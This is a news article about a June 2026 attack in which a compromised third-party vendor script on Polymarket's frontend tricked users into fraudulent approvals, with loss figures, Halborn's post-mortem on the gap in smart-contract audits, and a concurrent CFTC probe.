Attackers did not break Polymarket's smart contracts. They compromised a third-party frontend vendor, served malicious JavaScript through the legitimate prediction-market site and tricked users into approvals they had not intended to make.
The incident was disclosed on June 26, 2026. According to BleepingComputer, hackers compromised a vendor dependency and injected a malicious script into Polymarket's frontend. Users visiting the official site were redirected into fraudulent transaction approvals. Polymarket confirmed its own servers and backend infrastructure were not affected.
CoinDesk updated the loss figure to $3.1M on June 27, drained from 11 wallets. The stolen pUSD was swapped and bridged from Polygon to Ethereum, converting to approximately 1,893 ETH. Blockchain intelligence firm AMLBot was tracking the on-chain movement as of that update.
Polymarket said it would reimburse affected users. “We’re contacting impacted users and refunding them in full,” the platform told users, according to CoinDesk. The company characterized the incident as contained.
Halborn's post-mortem identified the structural gap: the attacker inserted malicious code into the Web2 frontend dependency layer, the part of the stack standard smart-contract audits do not assess. Audits verify on-chain logic. They do not cover every third-party JavaScript integration that can shape what a user sees and signs.
That distinction matters because code embedded in the interface can access user sessions and rewrite transaction approvals before they reach the chain. Halborn characterized the incident as a distinct and growing threat class: contracts can be sound while the interface relaying user actions to them remains exposed.
The hack also landed during a difficult regulatory week for Polymarket. Bloomberg and CNBC reported on June 26 that the Commodity Futures Trading Commission is conducting a broad probe into Polymarket's business and social media marketing practices, confirmed by a source familiar with the matter.
The investigation is separate from a prior CFTC and DOJ inquiry that was dropped without charges in 2025. It centers on alleged undisclosed paid promotion, not on the hack, but the two developments arrived the same week.